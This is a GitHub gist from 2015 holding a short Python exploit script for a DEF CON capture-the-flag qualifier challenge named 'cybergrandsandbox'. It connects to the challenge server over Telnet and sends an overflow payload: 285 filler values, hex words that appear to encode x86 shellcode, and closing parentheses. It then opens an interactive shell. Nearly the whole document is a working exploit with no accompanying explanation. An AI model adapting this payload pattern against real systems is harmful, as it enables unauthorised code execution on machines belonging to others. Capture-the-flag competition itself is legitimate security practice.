Skip to content

Instantly share code, notes, and snippets.

@peternguyen93 peternguyen93/CGC
Created May 18, 2015

Embed
What would you like to do?
Learn more about clone URLs
Download ZIP
Raw
CGC
#!/usr/bin/python
from Pwning import *
# customs when binary doesn't have nx eable or mprotect/nmap is on got table
# from Shellcode import *
# edit Templet with your own Name
class CGC(Payload):
def __init__(self):
Payload.__init__(self)
self.host[1] = 'cybergrandsandbox_e722a7ec2ad46b9fb8472db37cb95713.quals.shallweplayaga.me' # my Target host
self.port = 4347 # my Target port
self.mode = 0 # x86 target platform
# self.mode = 1 x86_64 target platform
self.conn = Telnet(self.host[1],self.port)
# ok i go to pwn it :D
def pwnTarget(self):
self.conn.read_until('> ')
pl = '0x41 '*285
pl+= "0x90909080 0xcd5b016a 0x58026a80 0xcd5a506a 0x5b036a59 0x5358036a 0x41 0x41"
pl+= ') '*25
self.conn.write(pl + '\n')
self.conn.interact() # pwn the shell
cgc = CGC()
cgc.pwnTarget()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.